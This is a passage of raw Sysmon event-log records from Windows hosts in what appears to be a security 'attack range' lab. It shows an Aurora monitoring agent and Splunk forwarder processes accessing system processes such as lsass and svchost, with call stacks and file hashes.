Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046311Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:31.792{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046310Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:31.788{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1400-00000000AF02}1060C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046309Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:31.776{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046308Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:31.770{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1200-00000000AF02}756C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046307Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:31.764{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1100-00000000AF02}492C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046306Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:31.755{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1000-00000000AF02}404C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046305Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:31.747{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0F00-00000000AF02}304C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046304Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:31.741{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0E00-00000000AF02}1004C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 23542300x800000000000000046303Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:31.737{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=C9D0FF6F884FB3C70F10C9CFBFD1E053,SHA256=A9C2B60EFA339F315B3EE3EA07B018247FA9E3D5F6AA1B5805AF7D9026B39A24,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000046302Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:31.734{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046301Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:31.726{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046300Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:31.697{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046299Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:31.694{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0900-00000000AF02}564C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 23542300x800000000000000046298Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:31.417{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E46866BFA35883F89E5F59F64F6A2C27,SHA256=2D8F6CB9D1C11A71FADC073AA7AF318D91EC8896C4734C12FF3FEE0BBC3C2D82,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000046297Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:31.338{FE4C2B44-E62B-63C7-8306-00000000AF02}45366840C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018568Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:31.637{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E62B-63C7-3802-00000000B002}4088C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018567Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:31.637{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018566Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:31.637{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018565Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:31.637{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018564Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:31.637{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018563Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:31.637{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018562Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:31.637{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018561Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:31.637{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018560Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:31.637{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018559Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:31.637{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018558Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:31.637{E5A8D418-DC43-63C7-0500-00000000B002}416964C:\Windows\system32\csrss.exe{E5A8D418-E62B-63C7-3802-00000000B002}4088C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018557Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:31.637{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E62B-63C7-3802-00000000B002}4088C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018556Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:31.638{E5A8D418-E62B-63C7-3802-00000000B002}4088C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000046296Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:31.182{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E62B-63C7-8306-00000000AF02}4536C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046295Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 